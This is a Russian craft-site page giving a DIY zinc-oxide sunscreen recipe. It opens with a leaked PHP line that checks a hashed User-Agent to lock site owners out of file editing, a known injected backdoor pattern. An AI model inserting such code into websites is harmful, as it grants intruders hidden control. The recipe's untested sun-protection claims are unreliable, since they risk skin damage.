if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем солнцезащитный лосьон своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Пошаговая инструкция как своими руками сделать солнцезащитный лосьон

С наступлением самого теплого времени года возникает потребность защищать свою кожу от ультрафиолетовых лучей специальными косметическими средствами. Но стоит такое удовольствие не дешево, и по сравнению с ценами производителей изготовить самостоятельно эффективный солнцезащитный лосьон будет гораздо проще.

С наступ­ле­ни­ем само­го теп­ло­го вре­ме­ни года воз­ни­ка­ет потреб­ность защи­щать свою кожу от уль­тра­фи­о­ле­то­вых лучей спе­ци­аль­ны­ми кос­ме­ти­че­ски­ми сред­ства­ми. Но сто­ит такое удо­воль­ствие не деше­во, и по срав­не­нию с цена­ми про­из­во­ди­те­лей изго­то­вить само­сто­я­тель­но эффек­тив­ный солн­це­за­щит­ный лосьон будет гораз­до проще.

Базо­вым ком­по­нен­том при изго­тов­ле­нии солн­це­за­щит­но­го лосьо­на ста­нет оксид цин­ка. Будь­те осто­рож­ны при рабо­те с ним, защи­щай­те дыха­тель­ные пути респи­ра­тор­ной мас­кой. Когда буде­те пла­вить мас­су с окси­дом цин­ка, создай­те в ком­на­те вен­ти­ля­цию, что­бы про­вет­рить вред­ные пары.

Для тако­го лосьо­на вам пона­до­бят­ся сле­ду­ю­щие компоненты:

  • Экс­тракт семян грейп­фру­та – 10 капель
  • Мас­ло жожо­ба – 1\3 стакана
  • Эфир­ное мас­ло лаван­ды – 20 капель
  • Воск эмуль­ги­ро­ван­ный – 1 ст. л.
  • Гель алоэ вера – 2 ст. л.
  • Оксид цин­ка – 2 ст. л.
  • Вода дистил­ли­ро­ван­ная – 1\2 стакана
  • Вита­мин Е – 1 ч. л.

Перей­дем к поша­го­вой инструк­ции по изго­тов­ле­нию домаш­не­го солн­це­за­щит­но­го лосьона.

Шаг 1.

Заки­пя­ти­те воду в паро­вар­ке. Сбавь­те огонь.

Шаг 2.

Поме­сти­те в верх­нюю часть паро­вар­ки сле­ду­ю­щие ком­по­нен­ты – оксид цин­ка, эфир­ное мас­ло жожо­ба и воск. Затем поставь­те эту часть на ниж­нюю, и на мед­лен­ном огне рас­плавь­те все ингредиенты.

Шаг 3.

После пол­но­го рас­тво­ре­ния вос­ка сни­ми­те паро­вар­ку с огня и добавь­те к полу­чен­ной мас­се вита­мин Е. Тща­тель­но выме­си­те всю смесь.

Шаг 4.

В отдель­ной посу­де подо­грей­те дистил­ли­ро­ван­ную воду с экс­трак­том алоэ.

Шаг 5.

Теп­лую воду сме­шай­те при помо­щи вен­чи­ка с пер­вой сме­сью до одно­род­но­го состояния.

Шаг 6.

Добавь­те в смесь экс­тракт грейп­фру­та и мас­ло лаван­ды. Вновь тща­тель­но пере­ме­шай­те полу­чен­ную мас­су и пере­лей­те в стек­лян­ную емкость с гер­ме­тич­но закры­ва­ю­щей­ся крышкой.

Солн­це­за­щит­ный лосьон при­го­тов­лен­ный в домаш­них усло­ви­ях готов к при­ме­не­нию! Бла­го­да­ря тако­му сред­ству вы смо­же­те защи­тить кож­ные покро­вы все­го тела от вре­до­нос­ных сол­неч­ных лучей, а так­же избе­жи­те пиг­мент­ных пятен, нерав­но­мер­ных заго­ре­лых участ­ков и предот­вра­ти­те появ­ле­ние мел­ких мор­щи­нок на лице.

Помни­те о наи­бо­лее опас­ном вре­ме­ни солн­це­пе­ка и ста­рай­тесь допол­ни­тель­но к лосьо­ну исполь­зо­вать защит­ные аксес­су­а­ры – очки, защи­ща­ю­щие кожу вокруг глаз, голов­ные убо­ры, кото­рые защи­ща­ют от перегреваний.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Katerinka666

Люблю все творческое и считаю что нет цены тому, что сделано своими руками! С удовольствием делюсь своими мастер-классами и пользуюсь чужими для совершенствования своих навыков! Читайте все мои записи!